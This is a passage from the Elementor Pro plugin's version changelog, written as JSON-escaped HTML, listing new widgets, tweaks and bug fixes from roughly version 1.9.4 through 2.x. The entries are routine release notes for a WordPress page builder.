WooCommerce: Gallery, Image, Price, Rating, Description, Breadcrumbs, Data Tabs, Stock, Related, Upsell, Title & Archive<\\/li>\\n<li>New: Introducing Cart Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4220\\\">#4220<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4600\\\">#4600<\\/a>)<\\/li>\\n<li>New: Added integration with Toolset (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2949\\\">#2949<\\/a>)<\\/li>\\n<li>New: Added integration with Pods (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4129\\\">#4129<\\/a>)<\\/li>\\n<li>New: Added stick to bottom in scrolling effects (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4799\\\">#4799<\\/a>)<\\/li>\\n<li>New: Added Scrolling Effect to Widgets under advanced tab<\\/li>\\n<li>New: Introducing Internal URL Dynamic Tag<\\/li>\\n<li>Tweak: Added a Last Updated Date in the Post Info widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4597\\\">#4597<\\/a>)<\\/li>\\n<li>Tweak: Added Redirect after Logout option for Login widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4447\\\">#4447<\\/a>)<\\/li>\\n<li>Tweak: Avoid repeating posts when using more than one in the Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1878\\\">#1878<\\/a>)<\\/li>\\n<li>Tweak: Add Custom Query hook for Query control (<a href=\\\"https:\\/\\/developers.elementor.com\\/custom-query-filter\\/\\\">More Info<\\/a>) (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1748\\\">#1748<\\/a>)<\\/li>\\n<li>Tweak: Added form-message style (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1180\\\">#1180<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic tag for button on the Price Table widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4242\\\">#4242<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic tag for Call to action widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4767\\\">#4767<\\/a>)<\\/li>\\n<li>Tweak: Added Dynamic Tags support for Google Map field (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4602\\\">#4602<\\/a>)<\\/li>\\n<li>Tweak: Added an support for <code>label|value<\\/code> in options field (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4594\\\">#4594<\\/a>)<\\/li>\\n<li>Tweak: Added <code>by-author<\\/code> condition for theme builder (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4681\\\">#4681<\\/a>)<\\/li>\\n<li>Tweak: Added Activate\\/Deactivate license key via WP-CLI command (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4149\\\">#4149<\\/a>)<\\/li>\\n<li>Tweak: Added <code>is_scroll<\\/code> trigger to scrolling effect (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4340\\\">#4340<\\/a>)<\\/li>\\n<li>Tweak: Added In Same Term support for Post Navigation widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4177\\\">#4177<\\/a>)<\\/li>\\n<li>Tweak: Added responsive control for Slides To Scroll control in all carousel widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3697\\\">#3697<\\/a>)<\\/li>\\n<li>Tweak: Added style options for Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1335\\\">#1335<\\/a>)<\\/li>\\n<li>Tweak: Added button CSS ID for Forms widget<\\/li>\\n<li>Tweak: Added pixel units to Post-Info divider height control<\\/li>\\n<li>Tweak: Rewrite sticky library to handle with stretch section, auto scroller & more bugs<\\/li>\\n<li>Tweak: Re-organize the panel categories per document type<\\/li>\\n<li>Tweak: Added ACF support for <code>options-page<\\/code> fields<\\/li>\\n<li>Tweak: Added dynamic tag for Animated headlines<\\/li>\\n<li>Tweak: Added dynamic tag for BlockQuote widget<\\/li>\\n<li>Fix: Elementor Full Width template in GeneratePress theme (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4817\\\">#4817<\\/a>)<\\/li>\\n<li>Fix: Checkbox fields can accidentally be set to required (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4324\\\">#4324<\\/a>)<\\/li>\\n<li>Fix: Initial slide in Carousel widget<\\/li>\\n<li>Fix: Stay on current slide while editing in Carousel widget<\\/li>\\n<li>Fix: Default slides per device in Carousel widget<\\/li>\\n<li>Deprecated: Woo Products, Woo Elements & Single elements widgets<\\/li>\\n<\\/ul>\\n<h4>2.0.18 - 2018-07-27<\\/h4>\\n<ul>\\n<li>Fix: Global widget error on saving page<\\/li>\\n<\\/ul>\\n<h4>2.0.17 - 2018-07-26<\\/h4>\\n<ul>\\n<li>Fix: Sub menu indicator direction in Nav Menu widget<\\/li>\\n<li>Fix: Change the title and icon for Global Widget when is moving<\\/li>\\n<li>Fix: CSS wrapper selector for Page Document<\\/li>\\n<\\/ul>\\n<h4>2.0.16 - 2018-07-16<\\/h4>\\n<ul>\\n<li>Tweak: CSS Filter Control module is now included in Elementor<\\/li>\\n<li>Fix: Border gap in Portfolio widget when item gap set as <code>0<\\/code> (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5077\\\">#5077<\\/a>)<\\/li>\\n<li>Fix: Restore current query after get Global Widget data<\\/li>\\n<li>Fix: Add action item in History on unlink Global widget<\\/li>\\n<\\/ul>\\n<h4>2.0.15 - 2018-07-10<\\/h4>\\n<ul>\\n<li>Fix: Dropdown menu items collapsing when activated (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4996\\\">#4996<\\/a>)<\\/li>\\n<li>Fix: GMT offset in Countdown widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4997\\\">#4997<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.0.14 - 2018-07-08<\\/h4>\\n<ul>\\n<li>Tweak: Added set method to form record for developers (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4983\\\">#4983<\\/a>)<\\/li>\\n<li>Fix: Autoplay option for Carousels<\\/li>\\n<li>Fix: Close mobile menu on item click in the Nav Menu widget<\\/li>\\n<\\/ul>\\n<h4>2.0.13 - 2018-07-03<\\/h4>\\n<ul>\\n<li>Tweak: Added compatibility for Elementor v2.1<\\/li>\\n<\\/ul>\\n<h4>2.0.12 - 2018-07-02<\\/h4>\\n<ul>\\n<li>Fix: Global widget PHP notices<\\/li>\\n<li>Fix: Slides widget active slide lost focus when clicking Editor tabs<\\/li>\\n<li>Fix: Form select field send all selected values on multiple selection<\\/li>\\n<li>Fix: Validate time field only if it\'s not empty<\\/li>\\n<li>Fix: ConvertKit API not saving name field<\\/li>\\n<\\/ul>\\n<h4>2.0.11 - 2018-06-12<\\/h4>\\n<ul>\\n<li>Fix: Theme Builder <code>author<\\/code> archive condition (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4593\\\">#4593<\\/a>)<\\/li>\\n<li>Fix: Respect password protected posts in Post Content widget<\\/li>\\n<li>Fix: Custom Fonts redirect to post edit screen in edge cases.<\\/li>\\n<\\/ul>\\n<h4>2.0.10 - 2018-06-05<\\/h4>\\n<ul>\\n<li>Tweak: Added <code>elementor\\/theme\\/get_location_templates\\/template_id<\\/code> filter hook for multi-language plugins<\\/li>\\n<li>Fix: Dynamic Post Terms missing taxonomies if the taxonomy is registered to more then one post types (#4386)<\\/li>\\n<li>Fix: Fields shortcode missing after removing a field in Form widget<\\/li>\\n<li>Deprecated: <code>get_theme_templates_by_location<\\/code> is replaced by <code>get_location_templates<\\/code><\\/li>\\n<\\/ul>\\n<h4>2.0.9 - 2018-05-28<\\/h4>\\n<ul>\\n<li>Fix: Compatibility for PHP version 5.4<\\/li>\\n<\\/ul>\\n<h4>2.0.8 - 2018-05-28<\\/h4>\\n<ul>\\n<li>Tweak: Added Active state for Nav Menu dropdown<\\/li>\\n<li>Tweak: Added style for "Nothing Found" Message for Archive Posts widget<\\/li>\\n<li>Tweak: Removed caption control in Site Logo widget<\\/li>\\n<li>Tweak: Added option to position currency symbol before\\/after In Price Table widget<\\/li>\\n<li>Fix: Query control manual selection does not show more than 10 items (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4479\\\">#4479<\\/a>)<\\/li>\\n<li>Fix: Styling glitch with terms list in Post Info widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4342\\\">#4342<\\/a>)<\\/li>\\n<li>Fix: Sub terms missing in Query control in edge cases (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4527\\\">#4527<\\/a>)<\\/li>\\n<li>Fix: Avoid rendering a template if it\'s not published<\\/li>\\n<li>Fix: 404 Page style not working<\\/li>\\n<li>Fix: Price Table button with hover animation not working in editor<\\/li>\\n<li>Fix: Styling conflict in Call to Action widget<\\/li>\\n<li>Fix: Global Widget tab translation<\\/li>\\n<li>Fix: Adding parent wrapper class to Site Title widget<\\/li>\\n<\\/ul>\\n<h4>2.0.7 - 2018-05-16<\\/h4>\\n<ul>\\n<li>Fix: Content not found on section when single is set to "All Singular"<\\/li>\\n<li>Fix: Open 404 template library for 404 page<\\/li>\\n<li>Tweak: Added CSS prefix for dev files<\\/li>\\n<li>Tweak: Removed product post type from display conditions<\\/li>\\n<\\/ul>\\n<h4>2.0.6 - 2018-05-15<\\/h4>\\n<ul>\\n<li>Tweak: Set type on create new single template<\\/li>\\n<li>Tweak: Always show the conditions dialog in the Draft status<\\/li>\\n<li>Tweak: Added document type <code>widget<\\/code><\\/li>\\n<li>Tweak: Added Post Custom Field tag to URL category<\\/li>\\n<li>Fix: When ACF Field Groups are Empty (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4428\\\">#4428<\\/a>)<\\/li>\\n<li>Fix: Links inside carousel in edge cases<\\/li>\\n<li>Fix: Responsive issue in My Templates area<\\/li>\\n<li>Fix: Image alignment for post content with text alignment<\\/li>\\n<li>Fix: Post Content widget when preview post is missing<\\/li>\\n<li>Fix: Global Widget tab translation<\\/li>\\n<li>Fix: Style settings for Post \\/ Archive Title widgets<\\/li>\\n<\\/ul>\\n<h4>2.0.5 - 2018-05-08<\\/h4>\\n<ul>\\n<li>Fix: Creating a CPT with name like document-type breaks the editor (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4203\\\">#4203<\\/a>)<\\/li>\\n<li>Fix: Added support for new version of reCAPTCHA<\\/li>\\n<li>Fix: Added fallback for controls after <code>post_status<\\/code><\\/li>\\n<li>Fix: Required field in forms widget<\\/li>\\n<li>Fix: Media Carousel in the Coverflow skin<\\/li>\\n<li>Fix: 404 Page show wrong template in edge cases<\\/li>\\n<li>Fix: Save the default menu in the Nav Menu widget<\\/li>\\n<\\/ul>\\n<h4>2.0.4 - 2018-05-02<\\/h4>\\n<ul>\\n<li>Tweak: Added parent\'s class for extended widgets<\\/li>\\n<li>Tweak: Set entire-site as default to avoid conflict with save without conditions<\\/li>\\n<li>Tweak: Initialize global model when it\'s needed<\\/li>\\n<li>Tweak: Removed some duplicate strings<\\/li>\\n<li>Tweak: Query control now includes empty terms<\\/li>\\n<li>Tweak: Design polish for conditions dialog<\\/li>\\n<li>Tweak: Decreasing <code>minimumInputLength<\\/code> to 1 of select2<\\/li>\\n<li>Fix: Editor not loading for single templates in edge cases<\\/li>\\n<li>Fix: Select2 in Safari takes it\'s time to get the original select width (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4310\\\">#4310<\\/a>)<\\/li>\\n<li>Fix: Slides per view not working for some effects<\\/li>\\n<li>Fix: New slides not showing in the editor<\\/li>\\n<li>Fix: Editor for section without a defined location, defaults to content area<\\/li>\\n<\\/ul>\\n<h4>2.0.3 - 2018-04-24<\\/h4>\\n<ul>\\n<li>Tweak: Optimize CSS for Post Info widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4214\\\">#4214<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4216\\\">#4216<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4225\\\">#4225<\\/a>)<\\/li>\\n<li>Fix: Double render on frontend view in core locations<\\/li>\\n<li>Fix: Masonry not working in edge cases<\\/li>\\n<li>Fix: Added default setting for Author Info tag<\\/li>\\n<\\/ul>\\n<h4>2.0.2 - 2018-04-18<\\/h4>\\n<ul>\\n<li>Fix: Regenerate conditions to include all templates<\\/li>\\n<\\/ul>\\n<h4>2.0.1 - 2018-04-17<\\/h4>\\n<ul>\\n<li>Tweak: Added div wrapper for Nothing Found massage (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4136\\\">#4136<\\/a>)<\\/li>\\n<li>Tweak: Show empty categories in Query Control & Display Conditions (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4127\\\">#4127<\\/a>)<\\/li>\\n<li>Tweak: Added Divider control for Post Info widget<\\/li>\\n<li>Fix: Update admin links in Yoast Breadcrumbs widget<\\/li>\\n<li>Fix: Sticky element conflict with clearfix CSS<\\/li>\\n<li>Fix: Compatibility for PHP version 5.4.32 & 5.5.16 and below<\\/li>\\n<li>Fix: Avoid running <code>wp_head<\\/code> hooks twice<\\/li>\\n<\\/ul>\\n<h4>2.0.0 - 2018-04-16<\\/h4>\\n<ul>\\n<li>New: Introducing Theme Builder - <a href=\\\"https:\\/\\/elementor.com\\/introducing-theme-builder\\/\\\">Release Post<\\/a> (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/417\\\">#417<\\/a>)<\\/li>\\n<li>New: Introducing Locations API to inject custom location templates<\\/li>\\n<li>New: Introducing Display Conditions for all dynamic templates<\\/li>\\n<li>New: Introducing Dynamic Tag feature - a new way to add dynamic content to your design<\\/li>\\n<li>New: Introducing Role manager to allow "Content Only mode" (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/483\\\">#483<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/653\\\">#653<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/885\\\">#885<\\/a>)<\\/li>\\n<li>New: Introducing 9 new dynamic widgets: Archive Posts, Archive Title, Post Content, Post Info, Post Title, Post Excerpt, Featured Image, Site Logo & Site Name (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/543\\\">#543<\\/a>)<\\/li>\\n<li>New: Introducing Developers area with guides and API documentation - <a href=\\\"https:\\/\\/elementor.com\\/introducing-elementor-developer-api\\/\\\">Release Post<\\/a> (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/451\\\">#451<\\/a>)<\\/li>\\n<li>New: Introducing <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor-hello-theme\\\">Elementor Hello Theme<\\/a> - A demonstration theme for developers<\\/li>\\n<li>New: Added new type of templates: Header, Footer, Single and Archive (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2761\\\">#2761<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2623\\\">#2623<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2109\\\">#2109<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2061\\\">#2061<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2439\\\">#2439<\\/a>)<\\/li>\\n<li>New: Design 404 page with Single template (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1558\\\">#1558<\\/a>)<\\/li>\\n<li>New: Design Search Results with Archive template (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3196\\\">#3196<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2590\\\">#2590<\\/a>)<\\/li>\\n<li>New: Added Scrolling Effect for sections including <em>Sticky Element<\\/em> per device (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2412\\\">#2412<\\/a>)<\\/li>\\n<li>New: Integration with Custom Fields (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2054\\\">#2054<\\/a>)<\\/li>\\n<li>New: Partial support for Toolset integration (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2949\\\">#2949<\\/a>)<\\/li>\\n<li>New: Partial support for Pods integration (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2169\\\">#2169<\\/a>)<\\/li>\\n<li>New: Partial support for ACF integration (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2041\\\">#2041<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2059\\\">#2059<\\/a>)<\\/li>\\n<li>Tweak: Add custom fields support for ActiveCampaign (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3531\\\">#3531<\\/a>)<\\/li>\\n<li>Tweak: Allow brackets in Forms Tel field<\\/li>\\n<li>Tweak: Added currency format control for Price Table widget<\\/li>\\n<li>Tweak: Reduced API request for some servers<\\/li>\\n<li>Fix: Dropdown <code>border-radius<\\/code> in Nav Menu widget<\\/li>\\n<li>Fix: Price List widget layout breaks in edge cases<\\/li>\\n<li>Note: This version requires Elementor v2.0.6<\\/li>\\n<\\/ul>\\n<h4>1.15.6 - 2018-03-28<\\/h4>\\n<ul>\\n<li>Fix: Removed duplicate Custom CSS section (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3938\\\">#3938<\\/a>)<\\/li>\\n<li>Fix: <code>box-shadow<\\/code> issue with cards skin (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3940\\\">#3940<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>1.15.5 - 2018-03-27<\\/h4>\\n<ul>\\n<li>Fix: Added global widget compatibility for Elementor v2.0<\\/li>\\n<li>Fix: Reduced API request for some servers<\\/li>\\n<\\/ul>\\n<h4>1.15.4 - 2018-03-26<\\/h4>\\n<ul>\\n<li>Tweak: Allow brackets in phone field<\\/li>\\n<li>Tweak: Added compatibility with Yoast 7.0.+<\\/li>\\n<li>Tweak: Added compatibility for the future release of Elementor v2.0<\\/li>\\n<li>Fix: Support for multiple carousel setting in editor<\\/li>\\n<li>Fix: <code>on_export<\\/code> issue in forms widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3890\\\">#3890<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>1.15.3 - 2018-03-07<\\/h4>\\n<ul>\\n<li>Tweak: Added unique class to field group div (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3595\\\">#3595<\\/a>)<\\/li>\\n<li>Fix: Screen Options missing when Pro is active (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3622\\\">#3622<\\/a>)<\\/li>\\n<li>Fix: Allow label styling even when <code>show labels<\\/code> is set hide (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3544\\\">#3544<\\/a>)<\\/li>\\n<li>Fix: Typography control not working in edge cases<\\/li>\\n<li>Fix: Safari compatibility for Search widget<\\/li>\\n<\\/ul>\\n<h4>1.15.2 - 2018-02-27<\\/h4>\\n<ul>\\n<li>Fix: Only add support mine-type if needed (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3543\\\">#3543<\\/a>)<\\/li>\\n<li>Fix: Better support for Old Typekit kits<\\/li>\\n<\\/ul>\\n<h4>1.15.1 - 2018-02-21<\\/h4>\\n<ul>\\n<li>Tweak: Custom font title placeholder is not <code>enter font family<\\/code><\\/li>\\n<li>Tweak: Custom font title set as required<\\/li>\\n<li>Fix: Custom font, <code>font-face<\\/code> enqueued only once if used in global (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3513\\\">#3513<\\/a>)<\\/li>\\n<li>Fix: Added workaround for upload validation which relies on a PHP extension (fileinfo) with inconsistent reporting behavior.<\\/li>\\n<\\/ul>\\n<h4>1.15.0 - 2018-02-19<\\/h4>\\n<ul>\\n<li>New: Added custom fonts manager for self hosted fonts (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/852\\\">#852<\\/a>)<\\/li>\\n<li>New: Integration with Adobe TypeKit fonts (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/631\\\">#631<\\/a>)<\\/li>\\n<li>Tweak: Clear menu from Nav Menu widget on template export<\\/li>\\n<li>Tweak: Allow zero for GetResponse integration as <code>day of cycle<\\/code><\\/li>\\n<\\/ul>\\n<h4>1.14.2 - 2018-02-13<\\/h4>\\n<ul>\\n<li>Fix: Global widget content that got affected by previous update<\\/li>\\n<\\/ul>\\n<h4>1.14.1 - 2018-02-13<\\/h4>\\n<ul>\\n<li>Tweak: Added <code>none<\\/code> option to content animation in CTA widget<\\/li>\\n<li>Tweak: Added <code>form_id<\\/code> to ActiveCampaign integration (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3422\\\">#3422<\\/a>)<\\/li>\\n<li>Fix: Page crashed when Global widget not found.<\\/li>\\n<\\/ul>\\n<h4>1.14.0 - 2018-02-12<\\/h4>\\n<ul>\\n<li>New: Added Call to Action widget<\\/li>\\n<li>Tweak: MailPoet pull field mapping from MailPoet instead of hardcoded<\\/li>\\n<li>Tweak: Added compatibility for the future release of Elementor v2.0<\\/li>\\n<li>Fix: Allow zero (0) to be accepted as a field value<\\/li>\\n<li>Fix: Login form when custom login URL is set<\\/li>\\n<li>Fix: Added Day of cycle control to GetResponse integration<\\/li>\\n<\\/ul>\\n<h4>1.13.2 - 2018-01-23<\\/h4>\\n<ul>\\n<li>Tweak: Added placeholder to Password field<\\/li>\\n<li>Tweak: Removed <code>subscriber_already_exists_message<\\/code> control to prevent potential data leakage<\\/li>\\n<li>Fix: MailPoet Subscriber Already Exists error validation against translated string directly from MailPoet<\\/li>\\n<li>Fix: Changed <code>imagesLoaded()<\\/code> to Vanilla JS to avoid compatibility issues with some themes<\\/li>\\n<li>Fix: Only validate Tel field if not empty<\\/li>\\n<li>Fix: Stop slider while editing<\\/li>\\n<\\/ul>\\n<h4>1.13.1 - 2018-01-16<\\/h4>\\n<ul>\\n<li>Fix: Added compatibility with old PHP versions<\\/li>\\n<\\/ul>\\n<h4>1.13.0 - 2018-01-16<\\/h4>\\n<ul>\\n<li>New: Added File Upload field for Forms widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1482\\\">#1482<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2974\\\">#2974<\\/a>)<\\/li>\\n<li>New: Added Acceptance field for Forms widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1693\\\">#1693<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2974\\\">#2974<\\/a>)<\\/li>\\n<li>New: Added Date field for Forms widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1868\\\">#1868<\\/a>)<\\/li>\\n<li>New: Added Time field for Forms widget<\\/li>\\n<li>New: Added Password field for Forms widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2164\\\">#2164<\\/a>)<\\/li>\\n<li>New: Added HTML field for Forms widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1500\\\">#1500<\\/a>)<\\/li>\\n<li>Tweak: Added characters validation for Tel field<\\/li>\\n<li>Tweak: Added min & max validation for Number field<\\/li>\\n<li>Tweak: Added multiple selection for Select field<\\/li>\\n<li>Tweak: Added donReach integration for Share Buttons widget<\\/li>\\n<\\/ul>\\n<h4>1.12.3 - 2018-01-09<\\/h4>\\n<ul>\\n<li>Fix: Render element plain content instead of parsed content when not needed in global widget<\\/li>\\n<li>Fix: Apply <code>url-encoding<\\/code> to "Tweet" button text in Blockquote widget to prevent unexpected corruption of the tweet text<\\/li>\\n<li>Fix: Removed My Account link from dashboard widget<\\/li>\\n<\\/ul>\\n<h4>1.12.2 - 2018-01-03<\\/h4>\\n<ul>\\n<li>Tweak: Added animation none for Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2964\\\">#2964<\\/a>)<\\/li>\\n<li>Fix: Active license button style<\\/li>\\n<\\/ul>\\n<h4>1.12.1 - 2018-01-02<\\/h4>\\n<ul>\\n<li>Tweak: Removed theme-element widgets from plain content<\\/li>\\n<li>Tweak: Set all theme-element widgets to extend same widget Base<\\/li>\\n<li>Tweak: Removed credit URL in forms meta data<\\/li>\\n<li>Tweak: Added compatibility for the future release of Elementor v1.9<\\/li>\\n<li>Fix: Validate Get response Error as real error<\\/li>\\n<li>Fix: Removed responsive height control from Facebook Page widget<\\/li>\\n<\\/ul>\\n<h4>1.12.0 - 2017-12-20<\\/h4>\\n<ul>\\n<li>New: Added Drip integration to Forms<\\/li>\\n<li>New: Added ActiveCampaign integration to Forms<\\/li>\\n<li>New: Added ConverKit integration to Forms<\\/li>\\n<li>New: Added GetResponse integration to Forms<\\/li>\\n<li>New: Added form <code>id<\\/code>, <code>name<\\/code> attributes to handle integration with auto collectors like HubSpot<\\/li>\\n<li>New: Added Global API key for MailChimp to improve the workflow<\\/li>\\n<li>Tweak: Better error handling and message display for Forms<\\/li>\\n<li>Fix: PHP notice Undefined variable <code>$cc_header<\\/code> (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2934\\\">#2934<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>1.11.0 - 2017-12-11<\\/h4>\\n<ul>\\n<li>New: Added a native Comments widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/543\\\">#543<\\/a>)<\\/li>\\n<li>New: Added an Author Box widget<\\/li>\\n<li>New: Added a Post Navigation widget<\\/li>\\n<li>New: Added a Yoast Breadcrumbs widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2749\\\">#2749<\\/a>)<\\/li>\\n<li>Tweak: Added a close button to search widget under Full Screen skin (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2762\\\">#2762<\\/a>)<\\/li>\\n<li>Fix: Allow currency symbol to appear even if price isn\'t numeric<\\/li>\\n<li>Fix: Edge cases when the nav menu is empty in a stretched section<\\/li>\\n<li>Fix: Added fallback when you remove the <code>space-between<\\/code> on Swiper carousel<\\/li>\\n<\\/ul>\\n<h4>1.10.2 - 2017-12-03<\\/h4>\\n<ul>\\n<li>Fix: Missing save widget icon (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2878\\\">#2878<\\/a>)<\\/li>\\n<li>Fix: Global widgets not saving edits (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2874\\\">#2874<\\/a>)<\\/li>\\n<li>Fix: Removed <code>white-space: nowrap;<\\/code> property from vertical menu in Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2815\\\">#2815<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>1.10.1 - 2017-11-30<\\/h4>\\n<ul>\\n<li>Tweak: Added default value for search form<\\/li>\\n<li>Tweak: Order template list A-Z in the library widget<\\/li>\\n<li>Tweak: get_users\\/authors query is now done using AJAX only, for better performance in Query Control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2865\\\">#2865<\\/a>)<\\/li>\\n<li>Fix: When adding <code>.00<\\/code> it is not displayed on the front<\\/li>\\n<li>Fix: Make sure space between is numeric for carousel control<\\/li>\\n<li>Fix: Added space for radio & checkbox fields in form widget<\\/li>\\n<\\/ul>\\n<h4>1.10.0 - 2017-11-15<\\/h4>\\n<ul>\\n<li>New: Added native Search form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2576\\\">#2576<\\/a>)<\\/li>\\n<li>Tweak: Added Slides To Scroll & Loop controls to Media Carousel and Testimonials widgets<\\/li>\\n<li>Tweak: Added Inline editing to Blockquote widget<\\/li>\\n<li>Fix: Animated Headline color bug (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2516\\\">#2516<\\/a>)<\\/li>\\n<li>Fix: Animated Headline with Rotating skin<\\/li>\\n<li>Fix: RTL fix for Animated Headline widget in \'typing\' and \'clip\' animations<\\/li>\\n<li>Fix: Empty menu cause jQuery to crash in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2662\\\">#2662<\\/a>)<\\/li>\\n<li>Fix: Custom CSS gone after reloading the editor<\\/li>\\n<\\/ul>\\n<h4>1.9.5 - 2017-10-27<\\/h4>\\n<ul>\\n<li>Fix: Broken Global widget with JS (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2639\\\">#2639<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>1.9.4 - 